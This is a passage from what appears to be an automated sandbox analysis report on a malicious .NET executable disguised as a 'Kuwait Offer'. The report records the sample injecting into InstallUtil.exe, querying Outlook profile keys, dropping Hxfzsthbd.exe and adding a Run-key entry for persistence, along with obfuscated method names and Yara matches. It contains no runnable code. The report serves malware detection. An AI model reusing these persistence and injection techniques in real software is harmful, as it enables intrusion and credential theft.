                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Kuwait Offer48783929281-BZ2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Kuwait Offer48783929281-BZ2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.cs.Net Code: Type.GetTypeFromHandle(nkhBLYZ5DmmAefrjLUi.xrXjFrFO06(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(nkhBLYZ5DmmAefrjLUi.xrXjFrFO06(16777259)),Type.GetTypeFromHandle(nkhBLYZ5DmmAefrjLUi.xrXjFrFO06(16777263))})
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.6360000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: Yara matchFile source: 0.2.Kuwait Offer48783929281-BZ2.exe.6440000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Hxfzsthbd.exe.38bcc40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1366255411.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E4C55 push es; retf 0_2_062E4C60
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_062E4BCB push es; iretd 0_2_062E4BCC
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634968D push esi; ret 0_2_0634968E
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063474C0 push 00000033h; iretd 0_2_063474C4
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0634CD8A push eax; retf 0_2_0634CD91
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06357740 push edi; ret 0_2_06357743
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06359D06 push es; retf 0_2_06359D20
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06359AAD push es; retf 0_2_06359AC4
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06359B19 push es; ret 0_2_06359B20
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0635FBB0 push es; ret 0_2_0635FC60
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063598E2 push es; iretd 0_2_063598E8
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0635699C pushfd ; ret 0_2_0635699E
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_063599ED push es; ret 0_2_063599F4
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_0662B689 push es; retf 0_2_0662B68C
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06631638 pushad ; retf 0_2_06631641
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 0_2_06631AB0 push eax; iretd 0_2_06631AB1
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579CD8B push eax; retf 3_2_0579CD91
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_0579968D push esi; ret 3_2_0579968E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A7740 push edi; ret 3_2_057A7743
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_057A699C pushfd ; ret 3_2_057A699E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A81638 pushad ; retf 3_2_05A81641
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 3_2_05A81A43 push eax; iretd 3_2_05A81AB1
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C80108 pushad ; retf 8_2_05C80A49
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C80101 pushad ; retf 8_2_05C80A49
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C80D13 push eax; iretd 8_2_05C80D1D
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C82FDF push D805A6D2h; iretd 8_2_05C83035
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05C82FE0 push D805A6D2h; iretd 8_2_05C83035
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBCD8B push eax; retf 8_2_05CBCD91
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CBB7C0 push dword ptr [ebp-4D8CFA35h]; retf 8_2_05CBB7C6
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CB968D push esi; ret 8_2_05CB968E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05CB9E24 pushfd ; retf 8_2_05CB9E26
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, qKrsZ6Xh2BPgI3QG5B3.csHigh entropy of concatenated method names: 'AEnXSP75Qo', 'r3HXpDgc6c', 'ncZ9a9Ov4eyZBHcHbGO', 'F8VePdOPcP5jLcK0dhO', 'lMNhklO5uOYgHDhdK0i', 'qSrY2ZOOf48qbujdVgH', 'BrGmxSO1tmiHlhOXNrI', 'yOMIcWObtT2kmCsYPL6', 'd27uulOFHNNAxIJDrYE', 'xvJcK2O4VyahE6pY3cO'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, XNydDG3QSPeG9HK83yi.csHigh entropy of concatenated method names: 'rZx36Q9O9G', 'RVPu0tT4CMU8yrwCcsy', 'Lxuc67TuKvvefvnr3qt', 'BdlTlhTGuACxaAtQhQW', 'IPuGo2TjV38UiIGBDLC', 'eOlI8mTgsN423EV9DK7', 'EEtyOxTcfglHWITiqBm', 'p1C3vRTRJQhRslkqhMd', 'jXQ7SaTqcPdmZuWF4tt', 'IGYMAvTH6vQvalrVwah'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'v2V6nCvtUAkjCCigSxf'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, eXY4r2XXYTg6TnxWgPU.csHigh entropy of concatenated method names: 'MEuXZh8WGa', 'hqy1Q3Od4QjMIDI18dF', 'MCDGmaOAfsiAwcwOCk4', 'gFWToCOrJGX1MIIWBfg', 'D0J3NwOQjrLfW06ijhA', 'CCqqZ2O9HxP2ZvbNbGR', 'Mm6UTMOpOdHk0piBtPr', 'keBtWKOVUVKp73K3vua'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, PRAEMPXVkOycUiYeXWl.csHigh entropy of concatenated method names: 'UJXXApYm1k', 'tGEdFUOowvBd1XjlFxG', 'pKJlNqOfhykUjEqCK3P', 'OwMCoWOW2H63I003nhp', 'iY1P4POKk3wBTeSC9cL', 'tTI9X7OCgkKjhYcbZ89', 'ctEicGO8BPSGiahw8Zo', 'jLfRtYO7BI6KNV18FUo', 'CbZlOuOzwfhQtNji488', 'RbMtBgvmpAjZrGQ6PD9'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, Dq6EcwZzO01O1On9r93.csHigh entropy of concatenated method names: 'qhwUQvPRIW', 'XK6U99sTxH', 'SfdU6fGmoM', 'FIiUTTFRlW', 'jGoUJ6peJo', 'VwUUIISPaJ', 'h58UtECKrm', 'oK40rITh5y', 'IxQUNQwVuT', 'BqVU5SJKgI'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, EK5X3A29oW0SqGSnjDt.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'hXi2TH708w', 'NtProtectVirtualMemory', 'LPxYtYttkhqhMQsPuW0', 'e2PB3ttNj8qHWJ9ZPMq', 'hPYqbdtJuQ9XXyoRnjk', 'Gajt5GtIwQ7iGjkXEcA'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, Assw3WEuPVaDj32x1iL.csHigh entropy of concatenated method names: 'YAiEcbIC52', 'IEHERtjsoX', 'BMfEjUf9SA', 'ncUEgyyVA0', 'Qw3QhM54vr45jsef6Ji', 'RZAcVf5utm8Xp6P9tcB', 'mN1HBR5GqoSs8JNO6m3', 'jJtdXK5bgOWI5PiXXQ4', 'Cm7M5E5FsHtDWqhGMSP', 'IKY0JC5jFIr9D27NkDq'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, QvvUOP2EJ2bx9FpHfxZ.csHigh entropy of concatenated method names: 'Udk2Mm5ReR', 'etd20tx06Y', 'Ia62swruR5', 'Wa42iKya8L', 'NsH2hXxKfx', 'AY72USVvgq', 'GG82StkE9H', 'R692p30S7S', 'VBs2VxQoXa', 'b342dn5Wxu'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, aQyXMcAVtflinnc32i.csHigh entropy of concatenated method names: 'Y6uQSe0Qv', 'q2S9ajiX1', 'FPSTYkn7N', 'YFG6uh6da', 'WZQwPdTxULbGnaLbUQ1', 'Pp3JFbTYWyLmASld0uP', 'a1RqQkT2JjAryZB0G3Y', 'QgTLdvTkObq9VdISEnP', 'cQRxV9TwV8qRSpxojRn', 'jhT5bmTEETiAysx8ile'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, k8lDge0jBPI0BmqVgW.csHigh entropy of concatenated method names: 'X3ZlQWW8T', 'F7JiAL1hD', 'wclUjtRjQ', 'YM6SRGmoE', 'KA0sMSc07', 'G2wJlI6W4On3UkqWhfZ', 'eTYwMm6KLdFTw08Wnrj', 'wMdgqG6CLFWlQikQNcd', 'Mc1a9f68QLsDLEVD8JL', 'lECX1O67uFZnVGnfnSL'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, HDSGMsEQZ9RAIsZMKMc.csHigh entropy of concatenated method names: 'LVwE6gKSet', 'futuP6Ng7mYtSh0eWhO', 'C0wNyuNc1rrHB1iSjw8', 'MRm64bNRu9daSD2WA39', 'CigARgNq30fsoFxAAq6', 'FY6UBZNG1TPsk7UUTck', 'CiW3TjNjhWhhnyuxhIv'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.csHigh entropy of concatenated method names: 'cOd9JHPZZAiL9ZRvWf7', 'ogQArCP03EaknhDVuIb', 'li1ZZ9gMK6', 'G4yOxSPijeWHVPnlg9p', 'RBYHIhPhw1yihWZVt2Y', 'q0uQA1PUa8vXx21sGNA', 'f64Fj3PSkQmSoZ01S6G', 'BMcNK6PpinlZwCUqj4P', 'nfdGZcPV2ylmuPode5j', 'Uj1sPCPd2axJwc7ig3l'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, QrsZjwY4XgjkZAMZfNB.csHigh entropy of concatenated method names: 'i1YYGqO5dn', 'dxTYjgALTR', 'rv7YgmtWnW', 'ne9nXlIPRGif1hjySQL', 'WO1p8QIOUZ8Wo8E8lLo', 'UXifAGIvOFhZ4awyUvX', 'X3mWBdI1rlKeGJWYpW5', 'TMeurVIbfdQbnTKXdLf', 'lGq5M4IFThrE27j54k6', 'HNLb58I4sPnndbHcB6Q'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, u9S2e4ZbQLq04Gpcx0u.csHigh entropy of concatenated method names: 'm3sZys5gSM', 'nPMZadYMmT', 'xYiZLYUnlf', 'OkeZoSVU4A', 'J26Zfxd2CT', 'HAVZWeXty6', 'V5bZKENwHX', 'BavZCu5O5Z', 'zxxZ82qChj', 'uxEZ7Fl8hL'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, XZdPKqEWZiLB4vCkkhY.csHigh entropy of concatenated method names: 'Tl9ECy7XTT', 'nguVRMO3BNciqSmdF6X', 'gHsjsFOBiGicCmTC7Z9', 'vkclDkOxnvB4glFjcvh', 'Epqi4MOYDpqimOt53D6', 'UQal6EO2ya5jIeVAnOf', 'V7cakHOmDhXb01XE1j6', 'Y20reAOnn5K9sMWaOKi'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, L8RRofEtam9VBMQjyZi.csHigh entropy of concatenated method names: 'cP0E5L2Db1', 'suAra6NfDR5bBp3ybTG', 'DEOkmqNWAeCjxKA7AX2', 'liJvwjNK9pMAkZnBI2P', 'AwLLv7NCAZ1oCdH36Qq', 'OHtGEUN8exagHxL9703', 'P17EPtN7RrkraRHju4h', 'GptqAENLEGG3eEVC9Er', 'mCbYFMNow1nK6mFuKti'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, gEqVvuYIyxfxwtO9xSX.csHigh entropy of concatenated method names: 'v6dYNSy8P5', 'fsMvNiJLwlYSbw6RN2A', 'GpB5MkJoC4uI1lu72QM', 'FHqZQbJfhOuZFXdodO9', 'eSHms2JW2yxsLQKEPuQ', 'nCe10tJyirJV1Sqi3Qa', 'LR6FX0Ja6Qke0Lx0JVl'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, xHqIX4XrNwnVC8mGYP5.csHigh entropy of concatenated method names: 'GauX99d7yZ', 'ebKX6mqGvm', 'WppVDLvYZ1WOWEPgU12', 'r3G87Uv2gQN7VII4Cdl', 'FDallnvB4yLcIqN8CsP', 'jRnHX5vxYMf9HQ89wZc', 'fJVaO7vkWprs5B3j2Pi', 'NlCERdvwq1fB2yqflDe', 's6ffd9vEyEtZndNEYKu'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, S2X8T02fxrkwkhaVMxm.csHigh entropy of concatenated method names: 'KMvwFLmkAB', 'Uv7qqeNly8pxV73LXpQ', 'Rm9pcnNiqdcUIYFkVbw', 'sEG1Pwt7fou6rngfhju', 'GSVqrDtzAQ2Jx3jKE5V'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, SE6DntY5yIJHYLCdHja.csHigh entropy of concatenated method names: 'QamYvqxlB9', 'CRaYPUmKwL', 'GQiY1ajXb9', 'Cf6YbEmSEr', 'nd1YFgkRqC', 'ndIqekJ7ekoa4ST7U3a', 'wrMMurJzpAKEUtUvWMg', 'xMrGakImon3nxFsTU8l', 'FrXpLrInCRgHwO6bkOh', 'tQDGTwI3hxoWmfQwch8'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, teM5YHE8KULy5jfnXg8.csHigh entropy of concatenated method names: 'KcVEz812bj', 'NQGXnrvQEM', 'zdKXmqO8vI', 'cVlanVOX4xwqTVnps6J', 'bb8Z9pOwNeSvMJH9lvE', 'BnmXo6OEZw44hcHk2G1', 'YLTtFFOMO5to3i20EBk', 'UNueugOZP89fkBOcqKu', 'hcDlywO0nImQtjtdPGg'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, SPGrqVX5bBOOWdocNcQ.csHigh entropy of concatenated method names: 'dGCjPH7Lsu', 'kHyvbAP3ZQe4xAQfHrd', 'NXUa26PBGLTx24oUh5x', 'pZPt2mPxeCU3iUCmJ07', 'uRgBKqPmaBOMgTWrPAg', 'xBBVvEPnqpb5JAjRy94', 'D3ZLbQPYvE4KW3DPchl', 'QDcKRtP2LHbLCpEALBL', 'mQBeSPPkEW0xKq2dv75'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, PPc7UVED9n2nxnBE3Bu.csHigh entropy of concatenated method names: 'waYEaJJUs7', 'OO5SEr5Hw50GX8G4Ph7', 'Ap4O1P5D84HrojxZPBc', 'CFd60T5y8efoCAKED7V', 'PksMtG5aRhQZGnegkdT', 'L3FCVF5LJ1MY6E7arCP', 'WBV84L5o9fwjLGVk5xl', 'ufgwYx5f5nEuFqg9Vyi', 'nbQHoj5Wj2F9oMhgcX0', 'hNuXkD5K87BTndcoX2q'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, VuZtyGEOCk87DCvEOt3.csHigh entropy of concatenated method names: 'zEPEP5o25R', 'e9DE11v2yF', 'ogq9N45mUclZCJv0TQc', 'ojJrX45nYmBgeSyO61A', 'RSadCX53QNIqBV2eKLG', 'YgfKMT5B8NyUSyv5sgX', 'VKfO6k5xBwF9GyUKlPt', 'hMxOOp5Y89hgOfSQocY', 'EofQeC52t5ILi5266Q1', 'RprHIY5kvJYTPtFm4aY'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.61c0000.7.raw.unpack, EK5X3A29oW0SqGSnjDt.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'hXi2TH708w', 'NtProtectVirtualMemory', 'LPxYtYttkhqhMQsPuW0', 'e2PB3ttNj8qHWJ9ZPMq', 'hPYqbdtJuQ9XXyoRnjk', 'Gajt5GtIwQ7iGjkXEcA'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.61c0000.7.raw.unpack, gEqVvuYIyxfxwtO9xSX.csHigh entropy of concatenated method names: 'v6dYNSy8P5', 'fsMvNiJLwlYSbw6RN2A', 'GpB5MkJoC4uI1lu72QM', 'FHqZQbJfhOuZFXdodO9', 'eSHms2JW2yxsLQKEPuQ', 'nCe10tJyirJV1Sqi3Qa', 'LR6FX0Ja6Qke0Lx0JVl'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.61c0000.7.raw.unpack, S2X8T02fxrkwkhaVMxm.csHigh entropy of concatenated method names: 'KMvwFLmkAB', 'Uv7qqeNly8pxV73LXpQ', 'Rm9pcnNiqdcUIYFkVbw', 'sEG1Pwt7fou6rngfhju', 'GSVqrDtzAQ2Jx3jKE5V'
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeFile created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HxfzsthbdJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HxfzsthbdJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
